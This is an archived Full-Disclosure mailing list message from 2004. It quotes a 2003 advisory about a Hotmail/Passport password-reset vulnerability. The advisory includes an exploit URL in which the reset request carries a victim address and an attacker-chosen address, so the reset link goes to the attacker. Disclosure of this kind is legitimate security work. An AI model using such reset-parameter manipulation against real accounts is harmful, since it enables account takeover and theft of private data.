lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040421064738.84731.qmail@web8002.mail.in.yahoo.com>
From: bhattsharma at yahoo.co.in (anirudh bhatt)
Subject: Re: Hotmail & Passport (.NET Accounts) Vulnerability

Isnt this the same vulnerabilitywhich was first
reported on FD(almost a year ago..) ..and supposedly
made FD "famous" (as regards being noticed by the
press).


> I am forwarding this as it may impact people whom
> depend on MSN or
> passport systems for business reasons. Contrary to
> what at
> least one of the full-disclosure follow-ups reports,
> it does work.
> 
> D
> 
> 
> ---------- Forwarded message ----------
> Date: Wed, 7 May 2003 19:50:51 -0700 (PDT)
> From: Muhammad Faisal Rauf Danka
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] Hotmail & Passport (.NET
> Accounts) Vulnerability
> 
> Hotmail & Passport (.NET Accounts) Vulnerability
> 
> There is a very serious and stupid vulnerability or
> badcoding in Hotmail / 
> Passport???s (.NET
> Accounts)
> 
> I tried sending emails several times to Hotmail /
> Passport contact 
> addresses, but always met
> with the NLP bots.
> 
> I guess I don???t need to go in details of how
> cruical and important Hotmail 
> / Passport???s
> .NET Account passport is to anyone.
> 
> You name it and they have it, E-Commerce, Credit
> Card processing, Personal 
> Emails, Privacy Issues,
> Corporate Espionage, maybe stalkers and what not.
> 
> It is so simple that it is funny.
> 
> All you got to do is hit the following in your
> browser:
> 
>
https://register.passport.net/emailpwdreset.srf?lc=1033&em=vanecarolina13@hotmail.com&id=&cb=&prefem=careverga7@.com&rst=1
> 
> And you???ll get an email on attacker@...acker.com
> asking you to click on a 
> url something like
> this:
> 
>
http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033
> 
> >From that url, you can reset the password and I
> don???t think I need to say 
> >anything more about
> it.
> 
> Vulnerability / Flaw discovered : 12th April 2003
> Vendor / Owner notified : Yes (as far as emailing
> them more than 10 times is 
> concerned)
> 
> 
> Regards
> --------
> Muhammad Faisal Rauf Danka
> 
>
_________________________________________________________________
> Charla con tus amigos en l?nea mediante MSN
> Messenger: 
> http://messenger.latam.msn.com/


________________________________________________________________________
Yahoo! India Matrimony: Find your partner online. http://yahoo.shaadi.com/india-matrimony/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ